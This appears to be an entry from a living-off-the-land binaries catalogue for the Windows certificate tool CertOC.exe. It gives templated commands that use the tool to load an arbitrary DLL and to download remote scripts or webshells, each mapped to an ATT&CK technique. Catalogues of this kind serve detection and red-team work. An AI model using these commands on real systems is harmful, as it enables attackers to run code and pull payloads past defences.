.. /CertOC.exe
Used for installing certificates
Paths:
- c:\windows\system32\certoc.exe
- c:\windows\syswow64\certoc.exe
Execute
-
Loads the target DLL file
certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}
- Use case
- Execute code within DLL file
- Privileges required
- User
- Operating systems
- Windows Server 2022
- ATT&CK® technique
- T1218
- Tags
Execute: DLL
Download
-
Downloads text formatted files
certoc.exe -GetCACAPS {REMOTEURL:.ps1}
- Use case
- Download scripts, webshells etc.
- Privileges required
- User
- Operating systems
- Windows Server 2022
- ATT&CK® technique
- T1105